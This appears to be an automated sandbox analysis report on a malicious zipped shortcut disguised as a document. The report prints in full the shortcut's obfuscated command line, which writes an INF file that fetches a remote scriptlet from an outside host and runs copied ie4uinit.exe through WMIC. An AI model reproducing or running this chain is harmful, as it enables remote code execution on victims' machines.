Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: classification engine

Classification label: mal52.evad.winZIP@23/9@1/1

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office

Jump to behavior

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr

PE file contains sections with non-standard names

Source: ie4uinit.exe.14.dr

Static PE information: section name: .didat

Binary contains a suspicious time stamp

Source: ie4uinit.exe.14.dr

Static PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Jump to dropped file

Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" \| set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" \| set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"	Jump to behavior

ID:	16737
Product:	CloudBasic
Start time:	23:30:11
Start date:	15.02.2023
Sample:	Education and Experience.lnk(1).zip
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Architecture:	WINDOWS
MD5:	254c94d8e782c1e10fd3021b56638bc7
SHA1:	cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:	af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
Filetype:	ZIP compressed archive (8000/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak	ASCII text, with CRLF line terminators	16783A1E3F36556A265FB98A68CFA261	218196E4BB48F554E5F2A8E85FECBD5ACC8122A9	27DEE6684AA699F0789479FB7BF1391528E10A11F2882C0625A97B4D30A4BE79
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt	ASCII text, with CRLF line terminators	D03731C634445BDAC7B8F0509F3574CA	B78EC2B7F14D1A669B7BF06AEBA09A49C48DC673	2207D9118753D81E22203A526E5D18CCA1E5598A1BF185CE6ED55224DC82BF40
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log	Unicode text, UTF-16, little-endian text, with CRLF line terminators	901B0CD404D2DC7404A22D5D937F90C8	F305E4859920252C78BE09641EFD021426BDC063	22E002A51FFD67FC1413910971687FDD131C967CF93093E8A4CBEE59EE8DFE78
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9F056460F96FCC2099C7536C5AB55F4C	FC1AA02C4C0E27283F6621BC317AD36D4BBE9931	3184AB0AC7B6C6D20DFBF1F38D9A5C83EFCEB80A5741A75F988A7C6BEF51ECB8
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	PE32+ executable (GUI) x86-64, for MS Windows	AD9AD3C852D59FBF125F02A09F1FF405	B9AFA6B8E91AA9936DDA909DBA18C34F64375282	A97BE066A1D5A7188E853FFF3582CE9FD6C66ACE9517F921F9FA738C1BE2A4EB
C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf	Windows setup INFormation	3C112980D3CF3B8A8A5E5D78DCC0E432	8C1B1FA6A9299820887F71E77AB561EDBCA11D73	36F0058CB1AEE4320F3F1A6C79B21A2918A5596C80F146FED0016E03C229E264
C:\Users\user\Favorites\Bing.url	Generic INItialization configuration [InternetShortcut]	5D42DDDDA9951546C9D43F0062C94D39	4AF07C23EBB93BAD9B96A4279BEE29EBA46BE1EE	E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E
C:\Windows\Temp\OLDF396.tmp	Windows setup INFormation	3C112980D3CF3B8A8A5E5D78DCC0E432	8C1B1FA6A9299820887F71E77AB561EDBCA11D73	36F0058CB1AEE4320F3F1A6C79B21A2918A5596C80F146FED0016E03C229E264
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	538DB4F88C2B08B1F7A1082DA9699C29	FA2DF1429C6A8D30A0FE03A5B952DD08F5FA0038	4BE6F5F1700C1FC8D4DB85808078B314E7B90D67FD3B78B62F7B0E7304EEFEF7

Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Education and Experience.lnk(1).zip

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Education and Experience.lnk(1).zip